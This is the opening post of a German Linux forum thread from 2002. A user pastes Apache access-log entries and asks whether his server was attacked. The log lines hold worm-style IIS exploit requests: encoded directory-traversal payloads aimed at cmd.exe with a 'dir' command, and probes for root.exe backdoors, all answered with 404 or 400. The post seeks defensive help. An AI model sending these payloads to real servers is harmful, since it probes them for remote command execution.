Linux 14.980 Themen, 106.326 Beiträge

Verfolgung starten Optionen

hacker angriff?

mork / 7 Antworten / Flachansicht Nickles

hi. ich hatte in den letzten tagen öfter die folgenden oder ähnliche einträge in meiner apache logdatei:

193.86.226.244 - - [30/Jun/2002:01:53:07 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
213.161.194.169 - - [30/Jun/2002:10:32:49 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
213.161.194.169 - - [30/Jun/2002:10:32:49 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
213.161.194.169 - - [30/Jun/2002:10:32:49 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
213.161.194.169 - - [30/Jun/2002:10:32:50 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
213.161.194.169 - - [30/Jun/2002:10:32:50 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
213.161.194.169 - - [30/Jun/2002:10:32:50 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.161.194.169 - - [30/Jun/2002:10:32:50 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.161.194.169 - - [30/Jun/2002:10:32:50 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
213.161.194.169 - - [30/Jun/2002:10:32:51 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
213.161.194.169 - - [30/Jun/2002:10:32:51 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
213.161.194.169 - - [30/Jun/2002:10:32:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
213.161.194.169 - - [30/Jun/2002:10:32:51 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
213.161.194.169 - - [30/Jun/2002:10:32:51 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
213.161.194.169 - - [30/Jun/2002:10:32:51 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
213.161.194.169 - - [30/Jun/2002:10:32:52 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
213.161.194.169 - - [30/Jun/2002:10:32:52 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
213.161.194.169 - - [30/Jun/2002:10:57:41 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
213.161.194.169 - - [30/Jun/2002:10:57:41 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
213.161.194.169 - - [30/Jun/2002:10:57:41 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
213.161.194.169 - - [30/Jun/2002:10:57:42 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
213.161.194.169 - - [30/Jun/2002:10:57:42 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
213.161.194.169 - - [30/Jun/2002:10:57:42 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.161.194.169 - - [30/Jun/2002:10:57:42 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.161.194.169 - - [30/Jun/2002:10:57:42 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
213.161.194.169 - - [30/Jun/2002:10:57:42 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
213.161.194.169 - - [30/Jun/2002:10:57:43 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
213.161.194.169 - - [30/Jun/2002:10:57:43 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
213.161.194.169 - - [30/Jun/2002:10:57:43 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
213.161.194.169 - - [30/Jun/2002:10:57:43 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
213.161.194.169 - - [30/Jun/2002:10:57:43 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
213.161.194.169 - - [30/Jun/2002:10:57:44 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
213.161.194.169 - - [30/Jun/2002:10:57:44 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

kann mir jemand sagen was das bedeutet? hat jemand auf meinen rechner zugegriffen oder hat er\'s nur versucht? muss ich mir sorgen machen? ich habe smoothwall als router/firewall und nur port 80 an den server weitergeleitet.

bei Antwort benachrichtigen